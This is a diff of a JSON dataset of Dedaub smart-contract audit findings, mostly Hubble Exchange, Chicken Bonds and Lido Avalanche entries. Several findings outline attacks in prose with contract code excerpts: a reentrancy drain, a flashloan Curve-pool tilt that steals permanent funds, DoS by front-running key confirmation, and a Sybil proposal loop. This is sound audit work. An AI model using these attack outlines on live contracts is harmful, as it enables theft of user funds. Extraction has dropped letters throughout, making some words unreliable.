July 22.pdf", - "body": "storage variables RESOLVED There are a few storage variables that are not used: ValidatorSelector::minimumRequiredStakeTimeRemaining AvaLido::mpcManagerAddress", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "blacklisting checks are incomplete RESOLVED The ClearingHouse contract can set and use a Blacklist contract to ban certain users from opening new positions. However, these same users are not blacklisted from providing liquidity to the protocol, i.e., having impermanent positions, which can be turned into permanent ones when the liquidity is removed. Although this form of opening positions is not controllable, it would be beer if blacklisted users were also banned from providing liquidity.", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "UnstakeRequest struct eld RESOLVED Field requestedAt of struct UnstakeRequest is not used.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "could potentially be reentered RESOLVED VUSD::processWithdrawals of the VUSD contract calls method safeTransfer on the reserveToken dened in VUSD. 01 function processWithdrawals() external whenNotPaused { uint reserve = reserveToken.balanceOf(address(this)); require(reserve >= withdrawals[start].amount, 'Cannot process withdrawals at this time: Not enough balance'); uint i = start; while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) { Withdrawal memory withdrawal = withdrawals[i]; if (reserve < withdrawal.amount) { break; } reserve -= withdrawal.amount; reserveToken.safeTransfer(withdrawal.usr, withdrawal.amount); i += 1; } start = i; } In the unlikely scenario that the safeTransfer method (or a method safeTransfer calls internally) of reserveToken allows calling an arbitrary contract, then that contract can reenter the processWithdrawals method. As the start storage variable will not have been updated (it is updated at the very end of the method), the same withdrawal will be executed twice if the contracts reserveToken balance is suicient. Actually, if reentrancy is possible, the whole balance of the contract can be drained by reentering multiple times. It is easier to perform this aack if the aackers withdrawal is the rst to be executed, which is actually not hard to achieve. This vulnerability is highly unlikely, as it requires the execution reaching an untrusted contract, still we suggest adding a reentrancy guard (minor overhead) to completely remove the possibility of such a scenario. 01 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them.", "labels": [ "Dedaub", - "Lido Avalanche", - "Severity: Informational" + "Hubble Exchange", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "can be made external RESOLVED OracleManager::getWhitelistedOracles can be dened as external instead of public, as it is not called from any code inside the OracleManager contract.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "usage increases quadratically to positions ACKNOWLEDGED Whenever a users position is modied, maintained or liquidated, all of the users token positions need to be queried (both maker and taker). For instance, this happens in ClearingHouse::getTotalNotionalPositionAndUnrealizedPnl for (uint i; i < numAmms; ++i) { if (amms[i].isOverSpreadLimit()) { (_notionalPosition, _unrealizedPnl) = amms[i].getOracleBasedPnl(trader, margin, mode); } else { (_notionalPosition, _unrealizedPnl,,) = amms[i].getNotionalPositionAndUnrealizedPnl(trader); } notionalPosition += _notionalPosition; unrealizedPnl += _unrealizedPnl; } Therefore, if we assume that a user with more positions and exposure to more tokens needs to tweak their positions from time to time, and the number of actions correlates the number of positions, the gas usage really scales quadratically to the number of positions for such a user.", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "optimization RESOLVED 01 In function AvaLido::claimUnstakedPrincipals there is a conditional check that if true leads to the transaction reverting with InvalidStakeAmount(). function claimUnstakedPrincipals() external { uint256 val = address(pricipalTreasury).balance; if (val == 0) return; pricipalTreasury.claim(val); // Dedaub: the next line can be moved before the claim if (amountStakedAVAX == 0 || amountStakedAVAX < val) revert InvalidStakeAmount(); // (rest of the functions logic) } This check could be moved before the principalTreasury.claim(val) as it is not aected by the call. This would lead to gas savings in cases where the transaction reverts, as the unnecessary call to treasury would be skipped.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "regarding the numerical methods of CurveMath.vy ACKNOWLEDGED [Below we use the notation of the curve crypto whitepaper] The CurveCrypto invariant in the case of pools with only two assets (N=2) can be simplied into a low degree polynomial, which could lead to a faster convergence of the numerical methods. 01 The coeicient K, when N=2 (we denote by x and y the deposits of the two assets in the pool), is given by the formula If we multiply both sides of the equation an equivalent equation, which is polynomial in all three variables x, y and D: by the denominator of K we get As you can see it is a cubic equation for x and y and you can use the formulas for cubic equations either to compute faster the solution or to get a beer initial value for the iterative method you are currently using. We believe it would be worth spending some time experimenting with the numerical methods to get the fastest possible convergence (and consequently reduced gas fees paid by the users).", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "contradicts with ValidatorSelector::minimumRequiredStakeTimeRemaining RESOLVED Even though ValidatorSelector::minimumRequiredStakeTimeRemaining is not used, it is dened as 15 days, while AvaLido::stakePeriod is dened as 14 days.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "functionality to remove AMMs ACKNOWLEDGED Governance has the ability to whitelist AMMs via ClearingHouse::whitelistAmm method, while there is no functionality to remove or blacklist an AMM.", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "spelt function name RESOLVED Function name hasAcceptibleUptime of the Types.sol contract should be corrected to hasAcceptableUptime. A11 Compiler bugs INFO The code is compiled with Solidity 0.8.10, which, at the time of writing, has some known bugs, which we do not believe to aect the correctness of the contracts. 01", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "collateral index checks are missing ACKNOWLEDGED There are several external methods of MarginAccount, namely addMargin, addMarginFor, removeMargin, liquidateExactRepay and liquidateExactSeize that do not implement a check on the collateral index supplied, which can lead to the ungraceful termination of the transaction if an incorrect index has been supplied. A simple check such as: require(idx < supportedCollateral.length, \"Collateral not supported\"); could be used to also inform the user of the problem with their transaction. 01", "labels": [ "Dedaub", - "Lido Avalanche", + "Hubble Exchange", "Severity: Informational" ] }, { - "title": "code ", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": " RESOLVED In UniswapLib.sol, the struct Slot0 denition is not being used. It is recommended that it be removed as it is dead code.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "event is missing timestamp eld ACKNOWLEDGED The AMM::PositionChanged event is potentially missing a timestamp eld that all related events (LiquidityAdded, LiquidityRemoved, Unbonded) other incorporate. trader", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "simplication RESOLVED In UniswapConfig.sol, all getTokenConfigBy* functions have a check that the index is not type(uint).max, however this is redundant as getTokenConfig already covers this case by checking that index < numTokens. For example: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash); // Dedaub: Redundant check; getTokenConfig checks that index < numTokens. That check covers the case where index == type(uint).max // if (index != type(uint).max) { return getTokenConfig(index); } revert(\"token config not found\"); } Can be simplied to: function getTokenConfigBySymbolHash(bytes32 symbolHash) public view returns (TokenConfig memory) { uint index = getSymbolHashIndex(symbolHash) return getTokenConfig(index); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "out code ACKNOWLEDGED In method MarginAccount::isLiquidatable the following line is commented out: _isLiquidatable = IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE; This is because IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE is equal to 0, which will be the default value of _isLiquidatable if no value is assigned to it, thus the above assignment is not necessary. Nevertheless, explicitly assigning the enum value makes the code much more readable and intiutive.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "trailing modier parentheses DISMISSED There are a couple of instances where even zero-argument modiers are used with parentheses, even though they can be omied. For example, in UniswapAnchoredView::activateFailover: function activateFailover(bytes32 symbolHash) external onlyOwner() { ... } This paern can be found in: UniswapAnchoredView::activateFailover UniswapAnchoredView::deactivateFailover Ownable::transferOwnership", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "constants ACKNOWLEDGED There are several magic constants throughout the codebase, many of them related to the precision of token amounts, making it diicult to reason about the correctness of certain computations. The developers of the protocol are aware of the issue and claim that they have developed extensive tests to make sure nothing is wrong in this regard.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "sanity check for xed price assets RESOLVED In the UniswapAnchoredView constructor, xed price assets (either ETH or USD pegged) check that the provided uniswap market is zero, however the reporter eld is unchecked. It is recommended that the reporter be also required to be zero, for consistency: else { require(uniswapMarket == address(0), \"only reported prices utilize an anchor\"); // Dedaub: Check that reporter is also 0 require(config.reporter == address(0), \"only reported prices utilize a reporter\"); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "price decimals assumption ACKNOWLEDGED The Oracle contract code makes the assumption that the price value returned by the ChainLink oracle has 8 decimals. This assumption appears to be correct if the oracles used report the price in terms of USD. Nevertheless, using the oracles available decimals method and avoiding such a generic assumption would make the code much more robust.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "functionality is cryptic (fetchAnchorPrice) RESOLVED The correctness of the calculation in UniswapAnchoredView::fetchAnchorPrice is very hard to establish. More comments would help. Specically, the code reads function fetchAnchorPrice(TokenConfig memory config, uint conversionFactor) internal virtual view returns (uint) { uint256 twap = getUniswapTwap(config); uint rawUniswapPriceMantissa = twap; uint unscaledPriceMantissa = rawUniswapPriceMantissa * conversionFactor; uint anchorPrice = unscaledPriceMantissa * config.baseUnit / ethBaseUnit / expScale; return anchorPrice; } The correctness of this calculation depends on the following understanding, which should be documented in code comments, or the functionality is entirely cryptic. (We note that the original UAV code had similar comments, although the ones below are our own.) getUniswapTwap returns the price between the baseUnits of the two tokens in a pair, scaled to e18 rawUniswapPriceMantissa * config.baseUnit : price of 1 token (instead of one baseUnit of token), relative to baseUnit of the other token. Still scaled at e18 unscaledPriceMantissa * config.baseUnit / expScale : (mathematically, not in integer arithmetic) price of 1 token relative to baseUnit of the other, scaled at 1 unscaledPriceMantissa * conversionFactor * config.baseUnit / ethBaseUnit / expScale : in the case of ETH-USDC, conversionFactor is ethBaseUnit, and the above happens to return 1 ETH's price in USDC with 6 decimals of precision, just because the USDC unit has 6 decimals in the case of other tokens, the conversionFactor is the 6-decimal ETH-USDC price, hence the result is the price of 1 token relative to 1 ETH, at 6-decimal precision.", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "can be reused ACKNOWLEDGED 01 The following code shared by methods MarginAccount::liquidateExactRepay and MarginAccount::liquidateExactSeize can be factored out in a separate method and reused: clearingHouse.updatePositions(trader); // credits/debits funding LiquidationBuffer memory buffer = _getLiquidationInfo(trader, idx); if (buffer.status != IMarginAccount.LiquidationStatus.IS_LIQUIDATABLE) { revert NOT_LIQUIDATABLE(buffer.status); } In addition, all the code of AMM::isOverSpreadLimit: function isOverSpreadLimit() external view returns(bool) { if (ammState != AMMState.Active) return false; uint oraclePrice = uint(oracle.getUnderlyingPrice(underlyingAsset)); uint markPrice = lastPrice(); uint oracleSpreadRatioAbs; if (markPrice > oraclePrice) { oracleSpreadRatioAbs = markPrice - oraclePrice; } else { oracleSpreadRatioAbs = oraclePrice - markPrice; } oracleSpreadRatioAbs = oracleSpreadRatioAbs * 100 / oraclePrice; if (oracleSpreadRatioAbs >= maxOracleSpreadRatio) { return true; } return false; } except line uint markPrice = lastPrice(); can be factored out in another method, e.g., _isOverSpreadLimit(uint markPrice), which will have markPrice as an argument. Then method _isOverSpreadLimit can be reused in methods _short and _long. 01", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "warning RESOLVED The Solidity compiler is issuing a warning for the UniswapAnchoredView::priceInternal function, that the return variable may be unassigned. While this is a false warning, it can be easily suppressed with a simple refactoring of the form: function priceInternal(TokenConfig memory config) internal view returns (uint) if (config.priceSource == PriceSource.REPORTER) return prices[config.symbolHash].price else if (config.priceSource == PriceSource.FIXED_USD) return config.fixedPrice; else { uint usdPerEth = prices[ethHash].price; require(usdPerEth > 0, \"ETH price not set, cannot convert to dollars\"); return usdPerEth * config.fixedPrice / ethBaseUnit; } }", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "modiers ACKNOWLEDGED Methods syncDeps of MarginAccount and InsuranceFund could be declared external instead of public.", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "code (UniswapConfig::getTokenConfig) RESOLVED The expression: ((isUniswapReversed >> i) & uint256(1)) == 1 ? true : false can be shortened to the more elegant: ((isUniswapReversed >> i) & uint256(1)) == 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Hubble Exchange/Hubble Exchange Audit.pdf", + "body": "code/contracts ACKNOWLEDGED tests/Executor.sol is not used. A12 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.9 which, at the time of writing, have some known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 01 CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts yields considerable power over the protocol, including changing the contracts holding the users funds, adding AMMs and tokens, which potentially means borrowing tokens using fake collateral, etc. In addition, the owner of the protocol can: - Blacklist any user. - Set important parameters in the vAMM which change the price of any assets: price_scale, price_oracle, last_prices. This allows the owner to potentially liquidate otherwise healthy positions or enter into bad debt positions. The computation of the Margin Fraction takes into account the weighted collateral, whose weights are going to be decided by governance. Currently the protocol uses NFTs for governance but in the future the decisions will be made through a DAO. Currently, there is no relevant implementation, i.e., the Hubble protocol does not yet oer a governance token. Still, even if the nal solution is decentralized, governance should be really careful and methodical when deciding the values of the weights. We believe that another, safer approach would be to alter these weights in a specic way dened by predetermined formulas and allow only small adjustments by the DAO. 01", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", + "Hubble Exchange", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Chainlink/Chainlink Uniswap Anchored View.pdf", - "body": "pragma RESOLVED The floating pragma pragma solidity ^0.8.7; is used in most contracts, allowing them to be compiled with any version of the Solidity compiler v0.8.* after, and including, v0.8.7. Although the dierences between these versions are small, floating pragmas should be avoided and the pragma should be xed to the version that will be used for the contract deployment (Solidity version 0.8.7 at the audit commit hash). A9 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.8.7 which, at the time of writing, have some known bugs. We inspected the bugs listed for version 0.8.7 and concluded that the subject code is unaected", + "title": "Pool deposits can be manipulated for possible gai ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": " RESOLVED (mitigated by commit cf15a5ac: time delay for shifting, limited shift window) The Chicken Bonds protocol gives arbitrary callers the ability to shift liquidity out of the stability pool and into Curve, when the price of LUSD (on Curve) is too high. This can be abused for a nancial aack if the protocol (i.e., the B.AMMSP) becomes a major shareholder of stability pool liquidity, as expected. Consider a scenario where the aacker notices a large liquidation coming in. Stability pool shareholders stand to gain up to 10%. The aacker wants to eliminate the B.AMMSP share from the stability pool and receive a larger part of the gains. The aacker can tilt the Curve pool (e.g., via flashloan) to get the LUSD price to be outside the of subsequent (too shiftLUSDFromSPToCurve, liquidity gets removed from the stability pool. high). With acceptable threshold call a H2 An aack tilting the Curve pool before a redeem allows the aacker to draw funds from the permanent bucket RESOLVED (commit 900d481a makes all Curve accounting be in virtual/relative terms) There is a Curve-pool-tilt aack upon a redeem operation. The core of the issue is the maintaining between transactions of a storage variable, permanentLUSDInCurve: 0 uint256 private permanentLUSDInCurve; // Yearn Curve LUSD-3CRV vault function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external { ... uint256 permanentLUSDCurveIncrease = (lusdInCurve - lusdInCurveBefore) * ratioPermanentToOwned / 1e18; permanentLUSDInCurve += permanentLUSDCurveIncrease; ... } function shiftLUSDFromCurveToSP(uint256 _maxLUSDToShift) external { ... uint256 permanentLUSDWithdrawn = lusdBalanceDelta * ratioPermanentToOwned / 1e18; permanentLUSDInCurve -= permanentLUSDWithdrawn; ... } The problem is that this quantity does not really reflect current amounts of LUSD in Curve, which are subject to fluctuations due to normal swaps or malicious pool manipulation. The permanentLUSDInCurve is then used in the computation of acquired LUSD in Curve: function getAcquiredLUSDInCurve() public view returns (uint256) { uint256 acquiredLUSDInCurve; // Get the LUSD value of the LUSD-3CRV tokens uint256 totalLUSDInCurve = getTotalLUSDInCurve(); if (totalLUSDInCurve > permanentLUSDInCurve) { acquiredLUSDInCurve = totalLUSDInCurve - permanentLUSDInCurve; } return acquiredLUSDInCurve; } A redeem computes the amount to return to the caller using the above function, as a proportion of the acquired LUSD in Curve: 0 function redeem(uint256 _bLUSDToRedeem, uint256 _minLUSDFromBAMMSPVault) external returns (uint256, uint256) { uint256 acquiredLUSDInCurveToRedeem = getAcquiredLUSDInCurve() * uint256 lusdToWithdrawFromCurve = acquiredLUSDInCurveToRedeem * (1e18 - redemptionFeePercentage) / 1e18; fractionOfBLUSDToRedeem / 1e18; uint256 acquiredLUSDInCurveFee = acquiredLUSDInCurveToRedeem - lusdToWithdrawFromCurve; yTokensFromCurveVault = _calcCorrespondingYTokensInCurveVault(lusdToWithdrawFromCurve); if (yTokensFromCurveVault > 0) { yearnCurveVault.transfer(msg.sender, yTokensFromCurveVault); } As a result, the aack consists of lowering the price of LUSD in Curve, by swapping a lot of LUSD, so that the Curve pool has a much larger amount of LUSD. The permanentLUSDInCurve remains as stored from the previous transaction and gets subtracted, so that the acquired LUSD in Curve appears to be much higher. The aacker calls redeem and receives a proportion of that amount (minus fees), eectively stealing from the permanent LUSD. The general recommendation is to not store between transactions any amount reflecting Curve balances (either total or partial). If a partial balance is to be kept, it should be kept in relative terms (i.e., a proportion) not absolute token amounts. MEDIUM SEVERITY: [No medium severity issues] LOW SEVERITY: ", "labels": [ "Dedaub", - "Chainlink Uniswap Anchored View", - "Severity: Informational" + "Chicken Bonds", + "Severity: High" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "math operations Status Resolved 4 In contract vArmor.sol functions vArmorToArmor() and armorToVArmor() perform numerical operations without checking for overow. In vArmorToArmor() overow of multiplication is not checked: function vArmorToArmor(uint256 _varmor) public view returns(uint256) { if(totalSupply() == 0){ return 0; } return _varmor * armor.balanceOf(address(this)) / totalSupply(); } Similar for armorToVArmor(). These functions are called during deposit and withdraw for calculating token amounts to be transferred, so erroneous results will have a signicant impact on the correctness of the protocol. M2 DoS by proposing proposals that need to be voted out quickly Open Any governance token holder can DoS their peers by proposing many unfavorable proposals, which need to be voted out. Voting proposals out will incur more gas fees as these are subject to a deadline (and may be voted down by multiple participants) whereas a proposer can also wait for the optimal time to spend gas. Low Severity ", + "title": "in exponentiation ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": " RESOLVED Iterative exponentiation by squaring (ChickenMath::decPow) could be simplied slightly from: while (n > 1) { if (n % 2 == 0) { x = decMul(x, x); 0 n = n / 2; } else { // if (n % 2 != 0) y = decMul(x, y); x = decMul(x, x); n = (n - 1) / 2; } } to: while (n > 1) { if (n % 2 != 0) { y = decMul(x, y); } x = decMul(x, x); n = n / 2; } We only recommend this change for reasons of elegance, not impact.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Medium" + "Chicken Bonds", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "and gov privileged users not checked for address zero Status Open In Timelock.sol the addresses of gov and admin are set during the construction of the contract. Requirements for checking non-zero addresses is suggested.", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": "unnecessary RESOLVED There is an assert statement in _firstChickenIn that is currently unnecessary. function _firstChickenIn(...) internal returns (uint256) { assert(!migration); The function is currently only called under conditions that preclude the assert: if (bLUSDToken.totalSupply() == 0 && !migration) { lusdInBAMMSPVault = _firstChickenIn(bond.startTime, bammLUSDValue, lusdInBAMMSPVault); } More generally, although there is a long-standing software engineering practice encouraging asserts for circumstances that should never arise, we discourage their use in deployed blockchain code, since asserts in the EVM do have a run-time cost.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Low" + "Chicken Bonds", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "introduce opportunities for reentrancy during swaps Open 5 In vArmor.sol, governance through a simple proposal can add tokenHelpers that are executed whenever a token transfer takes place. Token transfers also take place during swaps or other activities like deposits or withdrawals. The opportunity for reentrancy may not be immediately visible but if this were to be possible, consequences may include the draining of LP pool funds. L3 Proposer can propose multiple proposals (Sybil attack) Open A proposal can propose multiple proposals at the same time, defeating checks to disallow this: 1) Deposit enough $armor in the vArmor pool 2) Propose a proposal 3) Withdraw $armor from vArmor pool 4) Transfer $armor to a different address 5) Repeat The protocol offers the function cancel(uint proposalId) public to mitigate this attack, which proceeds in canceling a proposal if the proposers votes have fallen below the required threshold. However, this requires some users or the mutlisig to constantly be in a state of readiness. Other/Advisory Issues This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing. ", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": "computation of minimum DISMISSED, INVALID 01 (will remove) The minimum computation in the code below has a pre-determined outcome: function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external { (uint256 bammLUSDValue, uint256 lusdInBAMMSPVault) = _updateBAMMDebt(); uint256 lusdOwnedInBAMMSPVault = bammLUSDValue - pendingLUSD; // Make sure pending bucket is not moved to Curve, so it can be // withdrawn on chicken out uint256 clampedLUSDToShift = Math.min(_maxLUSDToShift, lusdOwnedInBAMMSPVault); // Make sure there's enough LUSD available in B.Protocol clampedLUSDToShift = Math.min(clampedLUSDToShift, lusdInBAMMSPVault); // Dedaub: the above is unnecessary. _updateBAMMDebt has its first // return value always be <= the second. So, clampedLUSTToShift // (which is <= _bammLUSDValue) will always be <= lusdInBAMMSPVault", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Low" + "Chicken Bonds", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "type declarations Status Open In contract ArmorGovernor.sol the parameters of several functions are declared as uint256, whereas most numerical variables are declared as uint. We suggest that a single style of declaration is used for clarity and consistency.", + "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/Chicken Bonds Audit.pdf", + "body": "in README.md INFO (RESOLVED) Under the section Shifter functions::Spot Price Thresholds, the conditions under which shifts are allowed are incorrect. The correct conditions should read: Shifting from the Curve to SP is possible when the spot price is < x, and must not move the spot price above x. Shifting from SP to the Curve is possible when the spot price is > y, and must not move the spot price below y. A5 Compiler bugs INFO (RESOLVED) The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, so as to be condent about the baseline 01 guarantees oered by the compiler. Version 0.8.10, in particular, has some known bugs, which we do not believe to aect the correctness of the contracts. CENTRALIZATION ASPECTS The design of the protocol is highly decentralized. The creation of bonds, chickening in/out and redemption of bLUSD tokens is all carried out without any intervention from governance. The shifter functions, ChickenBondManager::shiftLUSDFromSPToCurve and ChickenBondManager::shiftLUSDFromCurveToSP, which move LUSD between the Liquity stability pool and the curve pool are also public and permissionless. The Yearn Governance address holds control of the protocols migration mode which prevents the creation of new bonds, among other changes. There is no way to deactivate migration mode. Although new users will not be able to join the protocol, all current users will still be able to retrieve their funds, either through ChickenBondManager::chickenOut or ChickenBondManager::redeem. Yearn governance decisions are voted on by all YFI token holders and are executed by a 6-of-9 Multisig address. 01", "labels": [ "Dedaub", - "Armor Governance", + "Chicken Bonds", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "code style regarding subtractions Resolved In contract ArmorGovernor.sol functions cancel() and propose() include same subtraction operation (block.number - 1) twice but with slightly different implementation. One is executed immediately, while the other uses a safety checking function sub256(). In propose(): 6 require(varmor.getPriorVotes(msg.sender, sub256(block.number, 1)) > proposalThreshold(block.number - 1), Similar in cancel(). Underow seems unlikely in this case, however we suggest that all subtractions are performed in the same way for consistency.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "may irreversibly delete essential data DISMISSED Oracle::setNodeIDList deletes reportsByEpochId[latestEpochId], i.e., the latest epoch data, as they might no longer be valid due to validators being removed from the list. The latest epoch data is supplied to the Oracle contract via the OracleManager, which calls the function Oracle::receiveFinalizedReport and marks that the report for that epoch has been nalized, meaning that it cannot be resubmied. This information, which might irreversibly get deleted by the Oracle::setNodeIDList, is essential for the ValidatorSelector contract to proceed with the validator selection process. Thus, care should be taken to ensure that Oracle::setNodeIDList isnt called after OracleManager::receiveMemberReport and before ValidatorSelector::getAvailableValidatorsWithCapacity, as such a sequence of calls would leave the system in an invalid state.", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "errors in error messages Partially resolved (error in AcceptGov() remains) In contract Timelock.sol functions acceptGov() and setPendingGov() contain a typo in the error messages of a requirement. In acceptGov(): require(msg.sender == address(this), \"Timelock::setPendingAdmin: Call must come from Timelock.\"); Should become: require(msg.sender == address(this), \"Timelock::setPendingGov: Call must come from Timelock.\"); Similar for setPendingGov().", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "may revert due to array out-of-bounds error in ValidatorSelector::getAvailableValidatorsWithCapacity RESOLVED Function ValidatorSelector::getAvailableValidatorsWithCapacity retrieves the latest epoch validators from the Oracle in the validators array, computes how 0 many of those satisfy the ltering criteria and then creates an array of that size, result, and traverses again the validators array to populate it. function getAvailableValidatorsWithCapacity(uint256 amount) public view returns (Validator[] memory) { Validator[] memory validators = oracle.getLatestValidators(); uint256 count = 0; for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) count++; } Validator[] memory result = new Validator[](count); for (uint256 index = 0; index < validators.length; index++) { // ... (filtering checks on validators[index]) // Dedaub: index can get bigger than result.length. // Dedaub: a count variable needs to be used as in the above loop. result[index] = validators[index]; } return result; } However, there is a bug in the implementation that can cause an array out-of-bounds exception at line result[index] = validators[index]. Variable index is in the range [0, validators.length-1], while result.length will be strictly less than validators.length-1 if at least one validator has been ltered out of the initial validators array, thus index might be greater than result.length-1. Consider the scenario where validators = [1, 2] and count (or result.length) is 1 as the validator with id 1 has been ltered out. Then the second loop will traverse the whole validators array and will try to assign the validator with id 2 (array index 1) to result[1] causing an out-of-bounds exception, as result has a length of 1 (can only be assigned to index 0). Using a count variable, similarly to the rst loop, would be enough to solve this issue. 0", "labels": [ "Dedaub", - "Armor Governance", - "Severity: Informational" + "Lido Avalanche", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", - "body": "event emitted Resolved In contract Timelock.sol the function setPendingGov() emits a wrong event. emit NewPendingAdmin(pendingGov); Should become emit NewPendingGov(pendingGov); 7", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "due to the ability of a group to conrm any public key RESOLVED A DoS aack could be possible due to the ability of a group to perform conrmations for any given public key. More specically, we think that a group with adversary members can front-run the reportGeneratedKey() using a public key which was requested by another group, via requestKeygen(). By doing so, this public key will be conrmed by and assigned to the adversary group. // MpcManager.sol::reportGeneratedKey:214 if (_generatedKeyConfirmedByAll(groupId, generatedPublicKey)) { info.groupId = groupId; info.confirmed = true; ... } This will DoS the system for the benevolent group which will not be able to perform any further conrmations for this public key. // MpcManager.sol::reportGeneratedKey:208 if (info.confirmed) revert AttemptToReconfirmKey(); The adversary group can then proceed with joining the staking request changing the 